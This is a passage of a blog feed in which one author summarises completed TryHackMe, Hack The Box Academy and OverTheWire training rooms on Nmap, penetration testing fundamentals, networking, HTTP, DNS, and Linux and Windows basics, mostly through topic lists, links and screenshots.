&lt;p&gt;&lt;strong&gt;✅ Further Nmap: https:&lt;/strong&gt;//tryhackme.com/room/nmap01&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅ HTB Academy: Nmap Module:&lt;/strong&gt; &lt;a href="https://academy.hackthebox.com/module/details/19" rel="noopener noreferrer"&gt;https://academy.hackthebox.com/module/details/19&lt;/a&gt;&lt;br&gt;
                       &lt;strong&gt;or&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://medium.com/@romimkhan5588/network-enumeration-with-nmap-hack-the-box-56770b36490e" rel="noopener noreferrer"&gt;https://medium.com/@romimkhan5588/network-enumeration-with-nmap-hack-the-box-56770b36490e&lt;/a&gt; &lt;strong&gt;(walkthrough for Nmap module)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let me walk you through what I’ve learned and why these rooms are worth checking out.&lt;/p&gt;

&lt;p&gt;🛠️ 1. Nmap (Beginner) – TryHackMe&lt;br&gt;
This room introduced me to the fundamentals of Nmap:&lt;/p&gt;

&lt;p&gt;Understanding basic Nmap flags like -sS, -sV, -O, and -A&lt;/p&gt;

&lt;p&gt;Running simple scans on different ports&lt;/p&gt;

&lt;p&gt;Interpreting open/closed/filtered states&lt;/p&gt;

&lt;p&gt;I also got hands-on with:&lt;/p&gt;

&lt;p&gt;Host discovery&lt;/p&gt;

&lt;p&gt;Service and version detection&lt;/p&gt;

&lt;p&gt;Output formats (-oN, -oX, etc.)&lt;/p&gt;

&lt;p&gt;🚀 2. Further Nmap – TryHackMe&lt;br&gt;
This room builds on the basics and digs into advanced techniques:&lt;/p&gt;

&lt;p&gt;Aggressive scanning and firewall evasion&lt;/p&gt;

&lt;p&gt;Using Nmap Scripting Engine (NSE) to run specific vulnerability checks&lt;/p&gt;

&lt;p&gt;Timing and performance options (-T4, --min-rate, etc.)&lt;/p&gt;

&lt;p&gt;My favorite part was learning how to:&lt;/p&gt;

&lt;p&gt;Perform stealth scans&lt;/p&gt;

&lt;p&gt;Use custom decoys and spoof MAC addresses&lt;/p&gt;

&lt;p&gt;Chain Nmap with automation tools&lt;/p&gt;

&lt;p&gt;🧠 3. Nmap Module – Hack The Box Academy&lt;br&gt;
The HTB module gave me a structured and theory-backed understanding of:&lt;/p&gt;

&lt;p&gt;TCP/IP background and how Nmap leverages it&lt;/p&gt;

&lt;p&gt;Deep dive into scan types (TCP Connect, SYN, ACK, UDP)&lt;/p&gt;

&lt;p&gt;Practical scenarios in offensive security&lt;/p&gt;

&lt;p&gt;I appreciated how HTB combined educational content + interactive labs, helping me reinforce each concept in a real-world context.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvr9f1nxb7vib1i8qjx2s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvr9f1nxb7vib1i8qjx2s.png" alt="Image description" width="800" height="333"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fez7srt48jwsg59sz0vox.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fez7srt48jwsg59sz0vox.png" alt="Image description" width="800" height="322"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>From Fundamentals to Red Teaming: My TryHackMe Adventure</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Wed, 28 May 2025 14:38:34 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/from-fundamentals-to-red-teaming-my-tryhackme-adventure-1dko</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/from-fundamentals-to-red-teaming-my-tryhackme-adventure-1dko</guid>
      <description>&lt;p&gt;Hey everyone! 👋&lt;/p&gt;

&lt;p&gt;As part of my cybersecurity bootcamp, I recently completed a series of hands-on labs on TryHackMe. Each room gave me a deeper understanding of core cybersecurity concepts, red teaming, Linux fundamentals, and the methodology behind penetration testing. Here’s a breakdown of the rooms I completed and my key takeaways!&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Pentesting Fundamentals&lt;br&gt;
This room introduced the basics of penetration testing — including the phases like reconnaissance, scanning, exploitation, and post-exploitation. I practiced enumeration techniques and understood the importance of structured approaches in real-world engagements.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Writing Penetration Testing Reports&lt;br&gt;
Technical skills are vital, but so is communication! This room taught me how to write effective, professional, and impactful penetration testing reports — a crucial part of any red teamer’s job.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Red Team Fundamentals&lt;br&gt;
I explored the mindset and objectives of red teams, focusing on long-term stealth, persistence, and tactics that simulate advanced threat actors. This helped me understand the bigger picture in cyber offense.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Vulnerabilities 101&lt;br&gt;
This was a crash course on common vulnerabilities like SQL injection, XSS, and buffer overflows. The practical exercises helped me understand exploitation from both a red and blue team perspective.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Red Team Engagements&lt;br&gt;
This room walked me through the lifecycle of a red team operation, from scoping to execution to reporting. I learned about tools, techniques, and the importance of stealth and opsec.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Cyber Governance, Risk and Compliance&lt;br&gt;
Cybersecurity isn't just about hacking — it's also about governance and risk management. This module covered regulations like GDPR, ISO/IEC 27001, and how organizations build security strategies.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Security Principles&lt;br&gt;
In this room, I explored core security principles such as least privilege, defense in depth, and secure by design. These principles are vital to building strong, resilient systems.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Cyber Kill Chain&lt;br&gt;
Understanding the attacker’s process is essential. This room broke down the Cyber Kill Chain model and helped me map defensive strategies at each stage.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Linux Fundamentals Modules&lt;br&gt;
Linux is everywhere in cybersecurity, and this room gave me a solid grasp of command-line basics, file permissions, user management, and scripting. Super useful for any future engagements!&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbai7zt90n14akjamv9do.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbai7zt90n14akjamv9do.png" alt="Image description" width="800" height="316"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz8t5wgpcemau97unw4m1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz8t5wgpcemau97unw4m1.png" alt="Image description" width="800" height="302"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frf9axwpqo2nko86jwv35.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frf9axwpqo2nko86jwv35.png" alt="Image description" width="800" height="311"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhwbb5gebimvzm2rjyc1e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhwbb5gebimvzm2rjyc1e.png" alt="Image description" width="800" height="333"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qfdb1dee698i46inpty.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qfdb1dee698i46inpty.png" alt="Image description" width="800" height="301"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhi6n9mdku4hh2wlty07y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhi6n9mdku4hh2wlty07y.png" alt="Image description" width="800" height="327"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frhs07onr4hx8f4pzisij.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frhs07onr4hx8f4pzisij.png" alt="Image description" width="800" height="284"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdc8g3627qze1ycrqwzbm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdc8g3627qze1ycrqwzbm.png" alt="Image description" width="800" height="383"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0iyyn6mk3jfgajefe19.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0iyyn6mk3jfgajefe19.png" alt="Image description" width="800" height="333"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Journey Through Networking Concepts: Completing TryHackMe Rooms &amp; Hack The Box Academy’s Network Foundations Module</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Thu, 22 May 2025 12:16:56 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/journey-through-networking-concepts-completing-tryhackme-rooms-hack-the-box-academys-network-1epb</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/journey-through-networking-concepts-completing-tryhackme-rooms-hack-the-box-academys-network-1epb</guid>
      <description>&lt;ol&gt;
&lt;li&gt;Introduction to Networking (TryHackMe Room)
The Intro to Networking room on TryHackMe was the perfect starting point. This room provided a solid introduction to networking basics, focusing on topics such as IP addresses, subnets, and how devices communicate within a network. The tasks guided me through common networking tools, such as ping, traceroute, and ipconfig, which are crucial for troubleshooting and understanding network behavior.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Key Takeaways:&lt;/p&gt;

&lt;p&gt;The fundamentals of TCP/IP networking.&lt;/p&gt;

&lt;p&gt;How to configure IP addresses and subnet masks.&lt;/p&gt;

&lt;p&gt;The process of routing packets and how they traverse different networks.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Diving Deeper: Networking Concepts (TryHackMe Room)
After grasping the basics, I moved on to the Networking Concepts room. This room took my knowledge to the next level, diving deeper into more complex networking concepts like VLANs, NAT (Network Address Translation), and routing protocols such as RIP and OSPF.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Key Takeaways:&lt;/p&gt;

&lt;p&gt;An in-depth understanding of how networking is segmented with VLANs.&lt;/p&gt;

&lt;p&gt;The importance of NAT and how it helps in conserving IP addresses.&lt;/p&gt;

&lt;p&gt;A strong grasp on how routing protocols dynamically determine the best path for data to travel across a network.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Understanding HTTP in Detail (TryHackMe Room)
The HTTP in Detail room focused on the Hypertext Transfer Protocol (HTTP), the protocol that powers the web. Learning about HTTP methods, request-response cycles, headers, and status codes was crucial to understanding how websites interact with users. This room also explained the underlying concepts of HTTPS, cookies, and sessions, giving me a comprehensive understanding of web-based communication.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Key Takeaways:&lt;/p&gt;

&lt;p&gt;The different types of HTTP requests (GET, POST, PUT, DELETE, etc.).&lt;/p&gt;

&lt;p&gt;How web servers process requests and respond with appropriate status codes (200, 404, etc.).&lt;/p&gt;

&lt;p&gt;The role of cookies and how they maintain stateful sessions between clients and servers.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Deep Dive into DNS (TryHackMe Room)
DNS (Domain Name System) is the backbone of the internet, converting human-readable domain names into IP addresses. In the DNS in Detail room, I learned how DNS works, how to query DNS servers, and how attacks like DNS spoofing and cache poisoning can compromise systems. Understanding DNS is critical for penetration testers, as it plays a major role in many cyberattacks.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Key Takeaways:&lt;/p&gt;

&lt;p&gt;How DNS resolves domain names to IP addresses.&lt;/p&gt;

&lt;p&gt;The concept of authoritative DNS servers and how they are used in domain resolution.&lt;/p&gt;

&lt;p&gt;How DNS security mechanisms, like DNSSEC, help prevent attacks.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;How Websites Work (TryHackMe Room)
The How Websites Work room was a great follow-up, providing insights into the architecture and components of modern websites. From web servers to databases, front-end interactions to server-side processes, this room gave me a deeper appreciation of the technical side of websites.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Key Takeaways:&lt;/p&gt;

&lt;p&gt;The relationship between web servers, databases, and the application layer.&lt;/p&gt;

&lt;p&gt;The role of HTML, CSS, JavaScript in delivering dynamic web pages.&lt;/p&gt;

&lt;p&gt;How web hosting works and the importance of understanding web application security.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Hack The Box Academy: Network Foundations
In addition to TryHackMe, I also completed the Network Foundations module from Hack The Box Academy. This module was particularly helpful in providing hands-on experience with networking concepts. From packet analysis to working with network tools like Wireshark and Nmap, this module bridged the gap between theoretical knowledge and real-world application.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Key Takeaways:&lt;/p&gt;

&lt;p&gt;Hands-on experience with common network protocols like ARP, ICMP, and TCP.&lt;/p&gt;

&lt;p&gt;Understanding packet structures and how to analyze network traffic using tools like Wireshark.&lt;/p&gt;

&lt;p&gt;The role of firewalls, routers, and switches in network security and monitoring.&lt;/p&gt;

&lt;p&gt;Conclusion: Where Do I Go from Here?&lt;br&gt;
Completing these rooms and modules was a fantastic learning experience. Each resource provided a different piece of the networking puzzle, and together, they’ve given me a comprehensive understanding of how networks operate, how data is transferred, and how security vulnerabilities can be exploited. This knowledge will certainly help me as I continue my journey in cybersecurity.&lt;/p&gt;

&lt;p&gt;Moving forward, I plan to deepen my understanding of advanced networking concepts, like VPNs, IDS/IPS systems, and network automation. I’m also excited to explore how these skills translate into penetration testing and ethical hacking.&lt;/p&gt;

&lt;p&gt;I highly recommend these resources to anyone looking to strengthen their networking skills. Whether you’re new to the field or an experienced professional, there’s always something new to learn.&lt;/p&gt;

&lt;p&gt;Feel free to check out the links to the rooms and the Hack The Box Academy module that I completed. Happy learning, and see you in the next challenge!&lt;/p&gt;

&lt;p&gt;Links to Resources:&lt;br&gt;
Intro to Networking - &lt;a href="https://tryhackme.com/room/introtonetworking" rel="noopener noreferrer"&gt;https://tryhackme.com/room/introtonetworking&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Networking Concepts - &lt;a href="https://tryhackme.com/room/networkingconcepts" rel="noopener noreferrer"&gt;https://tryhackme.com/room/networkingconcepts&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;HTTP in Detail - &lt;a href="https://tryhackme.com/room/httpindetail" rel="noopener noreferrer"&gt;https://tryhackme.com/room/httpindetail&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;DNS in Detail - &lt;a href="https://tryhackme.com/room/dnsindetail" rel="noopener noreferrer"&gt;https://tryhackme.com/room/dnsindetail&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;How Websites Work - &lt;a href="https://tryhackme.com/room/howwebsiteswork" rel="noopener noreferrer"&gt;https://tryhackme.com/room/howwebsiteswork&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Network Foundations - &lt;a href="https://academy.hackthebox.com/course/preview/network-foundations" rel="noopener noreferrer"&gt;https://academy.hackthebox.com/course/preview/network-foundations&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls74753lcmm52x5ll2zy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls74753lcmm52x5ll2zy.png" alt="Image description" width="800" height="341"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd0p9r263zrobvzy4nai0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd0p9r263zrobvzy4nai0.png" alt="Image description" width="800" height="327"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frzyck0iqo4qmhtagv29o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frzyck0iqo4qmhtagv29o.png" alt="Image description" width="800" height="397"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls9o88t9bp97dgvqhoj7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls9o88t9bp97dgvqhoj7.png" alt="Image description" width="800" height="375"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnh4ozh8cp79l9ozx9iii.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnh4ozh8cp79l9ozx9iii.png" alt="Image description" width="800" height="384"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe2lzzgsxe56exgpcvl23.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe2lzzgsxe56exgpcvl23.png" alt="Image description" width="800" height="611"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Cracking the Code: My Cybersecurity Journey Through TryHackMe and OverTheWire</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Sat, 17 May 2025 08:16:37 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/cracking-the-code-my-cybersecurity-journey-through-tryhackme-and-overthewire-3915</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/cracking-the-code-my-cybersecurity-journey-through-tryhackme-and-overthewire-3915</guid>
      <description>&lt;p&gt;In this blog, I share my learning journey as I dove into the world of cybersecurity using platforms like TryHackMe and OverTheWire. I began with foundational Linux knowledge by completing these two rooms on TryHackMe:&lt;br&gt;
• Linux Fundamentals Part 1 – &lt;a href="https://tryhackme.com/room/linuxfundamentalspart1" rel="noopener noreferrer"&gt;https://tryhackme.com/room/linuxfundamentalspart1&lt;/a&gt;&lt;br&gt;
• Linux Modules – &lt;a href="https://tryhackme.com/room/linuxmodules" rel="noopener noreferrer"&gt;https://tryhackme.com/room/linuxmodules&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These rooms taught me how to navigate the Linux file system, understand essential commands, manage users and permissions, and much more. They laid a strong foundation for working in real-world security environments.&lt;/p&gt;

&lt;p&gt;Then, I shifted focus to the Windows operating system with the following rooms:&lt;br&gt;
• Windows Fundamentals Part 1 – &lt;a href="https://tryhackme.com/room/windowsfundamentals1xbx" rel="noopener noreferrer"&gt;https://tryhackme.com/room/windowsfundamentals1xbx&lt;/a&gt;&lt;br&gt;
• Windows Fundamentals Part 2 – &lt;a href="https://tryhackme.com/room/windowsfundamentals2x0x" rel="noopener noreferrer"&gt;https://tryhackme.com/room/windowsfundamentals2x0x&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These rooms gave me insight into Windows internals, user account controls, administrative tools, file paths, and how Windows handles system configurations—vital knowledge for anyone in cybersecurity.&lt;/p&gt;

&lt;p&gt;To challenge myself further, I took on the Bandit wargame from OverTheWire:&lt;/p&gt;

&lt;p&gt;• Bandit – &lt;a href="https://overthewire.org/wargames/bandit/" rel="noopener noreferrer"&gt;https://overthewire.org/wargames/bandit/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bandit is a set of progressively difficult levels that teach Linux shell commands through hands-on problem-solving. It was both fun and mentally stimulating, and it helped solidify my understanding of the command line.&lt;/p&gt;

&lt;p&gt;This blog is a reflection of what I’ve learned from these challenges—my progress, struggles, wins, and takeaways. If you're beginning your cybersecurity journey or just curious about hacking and systems, I hope my experience helps guide or inspire you to start your own path.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F00qf1vuadfqdcbvng2eb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F00qf1vuadfqdcbvng2eb.png" alt="Image description" width="800" height="326"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3o28rjo3wtgcdip06y2a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3o28rjo3wtgcdip06y2a.png" alt="Image description" width="800" height="333"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fajdfhtrr65vt2zgs3w7i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fajdfhtrr65vt2zgs3w7i.png" alt="Image description" width="800" height="468"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ty0fmdzqmyqmkxr4s9l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ty0fmdzqmyqmkxr4s9l.png" alt="Image description" width="800" height="374"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fct44q3e65szmox0m38vh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fct44q3e65szmox0m38vh.png" alt="Image description" width="800" height="370"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkj3s364mwztx0mtjsfh6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkj3s364mwztx0mtjsfh6.png" alt="Image description" width="800" height="432"&gt;&lt;/a&gt;&lt;br&gt;
